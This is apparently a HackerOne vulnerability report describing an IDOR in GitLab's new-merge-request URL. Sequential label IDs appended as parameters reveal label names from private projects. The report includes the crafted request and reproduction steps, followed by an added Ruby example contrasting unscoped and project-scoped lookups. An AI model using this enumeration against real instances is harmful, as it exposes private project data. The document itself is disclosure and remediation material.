Get all labels from gitlab IDOR- new Merge requests endpoint
HackerOne report #507113 by ashish_r_padelkar
on 2019-03-09, assigned to hackerjuan
Summary:
It is possible to get all label names from gitlab by enumerating through label IDs irrespective of project visibility settings, i.e. you can get names of labels which belong to private projects too.
Description:
When you create a new merge request, the URL looks like the one below:
https://gitlab.com/<UserName>/<ProjectName>/merge_requests/new?utf8=%E2%9C%93&merge_request%5Bsource_project_id%5D=<ID>&merge_request%5Bsource_branch%5D=master1&merge_request%5Btarget_project_id%5D=<ID>&merge_request%5Btarget_branch%5D=master
Now if you append the parameter &merge_request[label_ids][]=<LabelID> to the above request, the name of the label will be populated in the Labels dropdown in the UI.
So the final request would be:
https://gitlab.com/<UserName>/<ProjectName>/merge_requests/new?utf8=%E2%9C%93&merge_request%5Bsource_project_id%5D=<ID>&merge_request%5Bsource_branch%5D=master1&merge_request%5Btarget_project_id%5D=<ID>&merge_request%5Btarget_branch%5D=master&merge_request[label_ids][]=<LabelID>
Steps To Reproduce:
- As a project member of any project with the capability of creating merge requests, click on creating a new merge request.
- You will be navigated to a URL something like the one below:
  https://gitlab.com/<UserName>/<ProjectName>/merge_requests/new?utf8=%E2%9C%93&merge_request%5Bsource_project_id%5D=<ID>&merge_request%5Bsource_branch%5D=master1&merge_request%5Btarget_project_id%5D=<ID>&merge_request%5Btarget_branch%5D=master
- Append &merge_request[label_ids][]=<LabelID> to the above URL.
- The name of the label will be populated in the Labels dropdown in the UI.
- As this is a sequential ID, we can enumerate all gitlab labels irrespective of project visibility settings.
Regards,
Ashish
Impact
Get all Labels from gitlab IDOR irrespective of project visibility settings at merge request endpoint
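The missing check behind this report, shown as an added Ruby example that is not GitLab's code and not part of the original report: a form pre-fill that resolves client-supplied label IDs from a global table, next to one scoped to the target project. The Label and Project structs, the sample data and all function names are constructed for illustration, and the model is simplified to project-level labels only.

```ruby
# Hypothetical in-memory model (assumption; not GitLab's schema or code).
Label   = Struct.new(:id, :title, :project_id)
Project = Struct.new(:id, :name, :visibility, :member_ids)

# Constructed sample data: label IDs are sequential across all projects.
PROJECTS = {
  1 => Project.new(1, "public-app",   :public,  [10]),
  2 => Project.new(2, "secret-infra", :private, [20]),
}.freeze

LABELS = {
  100 => Label.new(100, "bug",               1),
  101 => Label.new(101, "acquisition-alpha", 2),
  102 => Label.new(102, "frontend",          1),
}.freeze

# Accept only plain decimal IDs; anything else becomes nil.
def parse_id(raw)
  raw.to_s.match?(/\A\d+\z/) ? raw.to_i : nil
end

# Flawed pattern: any ID in merge_request[label_ids][] is looked up in the
# global table, so titles from unreadable projects reach the rendered form.
def resolve_labels_unscoped(label_ids)
  label_ids.map { |raw| LABELS[parse_id(raw)] }.compact
end

# Hardened pattern: the caller must be a member of the target project, and
# only labels owned by that project are resolved. Foreign, unknown and
# malformed IDs are dropped the same way, so the response does not reveal
# whether a given ID exists elsewhere.
def resolve_labels_scoped(label_ids, target_project_id:, user_id:)
  project = PROJECTS[target_project_id]
  return [] unless project && project.member_ids.include?(user_id)

  label_ids
    .map { |raw| LABELS[parse_id(raw)] }
    .compact
    .select { |label| label.project_id == project.id }
end

def titles(labels)
  labels.map(&:title)
end
```

The same scoping belongs on every endpoint that accepts label IDs, since the ID space is shared and sequential.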